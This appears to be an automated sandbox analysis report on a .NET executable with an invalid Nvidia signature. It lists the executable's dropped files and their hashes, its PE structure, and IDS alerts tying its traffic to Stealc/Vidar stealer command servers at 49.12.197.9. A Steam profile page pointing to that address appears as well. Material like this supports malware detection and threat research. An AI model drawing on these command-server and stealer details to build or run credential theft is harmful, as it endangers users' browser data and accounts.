                                                                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):98304
                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):155648
                                                                                                                          Entropy (8bit):0.5407252242845243
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):51200
                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):685392
                                                                                                                          Entropy (8bit):6.872871740790978
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Joe Sandbox View:
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):608080
                                                                                                                          Entropy (8bit):6.833616094889818
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):450024
                                                                                                                          Entropy (8bit):6.673992339875127
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2046288
                                                                                                                          Entropy (8bit):6.787733948558952
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):257872
                                                                                                                          Entropy (8bit):6.727482641240852
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):80880
                                                                                                                          Entropy (8bit):6.920480786566406
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42
                                                                                                                          Entropy (8bit):4.0050635535766075
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                          MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                          SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                          SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                          SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                          Malicious:true
                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):34879
                                                                                                                          Entropy (8bit):5.398607497371507
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2v:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtPD
                                                                                                                          MD5:8BA614C10AC29EA5BBB5F6A02923096E
                                                                                                                          SHA1:D69BC8D7CD69E32F8FA05B796F926658A9B90941
                                                                                                                          SHA-256:96628903BF146A49D9B112C8BA25FC756F35B4943CF584179BF8856AFF79F927
                                                                                                                          SHA-512:977E80718C694E835817CDA706E9ED7336493E9FF3515DE45F1BB4E155D8FEFA8D76A4F5C5D3F0C1FA16B92C88E27C8857AFEC64163127C575ABE0BF03F6AE3F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):13
                                                                                                                          Entropy (8bit):2.8150724101159437
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:+MEM:+BM
                                                                                                                          MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                          SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                          SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                          SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                          Malicious:false
                                                                                                                          Preview:Unknown error
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1048575
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:fPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP3:f
                                                                                                                          MD5:C1C54CFC4D7B15B63B1844C9379B3862
                                                                                                                          SHA1:0564C717F1A392D254218FDDEBB9A9E36B57E4B8
                                                                                                                          SHA-256:D735D28333CED8067C04FDB4C0D2B0E0B6D085C28A39B00F1E8314B0E529CC1D
                                                                                                                          SHA-512:5DF4BAC25F1EDA7238E368179321E57BEC2E9B02982F23A7D870DAE375CAE6DD536BF44DAC27CA01748D7235EAB386341F3265D3AD4347167F8697A4573F835F
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):598016
                                                                                                                          Entropy (8bit):6.952931140788552
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:dfK7na3lNTVvqotaCsq/0TT5GvdKM9KwdTVLG:dfUaTVZtaCsJMkcG
                                                                                                                          MD5:54B8F43259C486D87DBB9B4B4A71014B
                                                                                                                          SHA1:373351ECC936B3F9DBB2C858CD0342CA7AF807E8
                                                                                                                          SHA-256:6CF354D8C07B353870741C6C53F467743E214B4D170E92316D566B555268A44B
                                                                                                                          SHA-512:9460135D568807652689189CF3FE8C8B641C0E3B7582F6F9DC35EEFC36B82312FCDC9C08F841024717F62F23160B2CDB6AC3B1EB3188029656A7913114D354C2
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1835008
                                                                                                                          Entropy (8bit):4.4139407417976715
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:Icifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNb5+:9i58oSWIZBk2MM6AFBZo
                                                                                                                          MD5:61B9DC452FE2F4E269CB400E00323748
                                                                                                                          SHA1:025DCC6464006A43A5B09981ABE840F4A95213B0
                                                                                                                          SHA-256:5E97FAC7CEB08C82014762EF97CEAD28A48CD14813CA0E55CDDD6A8F09F9DF07
                                                                                                                          SHA-512:996EB6557A47886593EC26D7AC8787D66949176B2B2C3DA86AB0F87E97FC551F5E7542E1309CD4CC3B703946E86E38F0AB0C39318BA2AB2F56FCC4033CCE2C18
                                                                                                                          Malicious:false
                                                                                                                          Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.c.e3..................................................................................................................................................................................................................................................................................................................................................Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Entropy (8bit):7.888057525301734
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                          File name:file.exe
                                                                                                                          File size:405'544 bytes
                                                                                                                          MD5:cc94be13bc24599e326d03ca246a61fa
                                                                                                                          SHA1:73ed54a021153213ee4823683e4a9376b479d939
                                                                                                                          SHA256:41ee1357282ed8722ff127ac17ff0831a92a54e72c32a560abeae0d27f5c090e
                                                                                                                          SHA512:b2da25e014462b410d8a68dfd09c0159772271b7f706c95ab2ef517060dd5305a02b49ac021a80d9c21624c8c02bdde9b62be9dcbace2308802edcc3a336b125
                                                                                                                          SSDEEP:6144:bXqwxGuBem9P3ofEPGc8V8vkl4vn6QdG9eB4RyWTkui4ZR6d0psZ8EZ:bXqGGTvNUw435B4pZR6d0psaEZ
                                                                                                                          TLSH:7884CF9C766072DFC857C472DEA86C68EA6078BA530F4607A06752EDDE4D897CF180F2
                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                          Entrypoint:0x46800a
                                                                                                                          Entrypoint Section:
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows cui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x66FDF1E0 [Thu Oct 3 01:22:40 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                          Error Number:-2146869232
                                                                                                                          Not Before, Not After
                                                                                                                          • 26/02/2022 01:00:00 02/03/2023 00:59:59
                                                                                                                          Subject Chain
                                                                                                                          • CN=Nvidia Corporation, OU=IT-MIS, O=Nvidia Corporation, L=Santa Clara, S=California, C=US
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:1CCB73FCDB6A7BE7C04978F53E40695A
                                                                                                                          Thumbprint SHA-1:CA0F1595C0C349C003D41743460E448E887F9477
                                                                                                                          Thumbprint SHA-256:1E56D8CFAE4119883632D8FD6E1E3ACDF16CDDAB9621FCA4D6CFFB1A663E74D1
                                                                                                                          Serial:0800EE4ED1A959CC9887E905AD662BFE
                                                                                                                          Instruction
                                                                                                                          jmp dword ptr [00468000h]
                                                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x58750 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0x728 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x60a00 | 0x2628 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x66000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x68000 | 0x8 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x58000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
25W~Dos | 0x2000 | 0x55028 | 0x55200 | 0f8207d5bb48109fc08199d046b6375a | False | 1.0003326908957415 | data | 7.999495427642678 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text | 0x58000 | 0xa7a0 | 0xa800 | 51f2e6193403c30474940064b0912069 | False | 0.38757905505952384 | data | 4.7274769501515355 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x64000 | 0x728 | 0x800 | b884fb10c9d86f2f0996c4bd8682dad7 | False | 0.3916015625 | data | 3.825424770100372 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x66000 | 0xc | 0x200 | 354e5ffc7f8a670c981da5a85608e4ce | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
 | 0x68000 | 0x10 | 0x200 | 9dcbd1f73890007ff6899f2f1fba13ac | False | 0.044921875 | data | 0.13872951814887827 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x640a0 | 0x498 | OpenPGP Public Key | | | 0.4226190476190476
RT_MANIFEST | 0x64538 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-03T03:26:43.493413+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57947 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:44.657800+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57948 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:46.021316+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57949 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:46.730519+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.7 | 57949 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:47.472469+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57950 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:48.172762+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 49.12.197.9 | 443 | 192.168.2.7 | 57950 | TCP
2024-10-03T03:26:48.838450+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.7 | 57951 | 49.12.197.9 | 443 | TCP
2024-10-03T03:26:49.661070+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 49.12.197.9 | 443 | 192.168.2.7 | 57951 | TCP
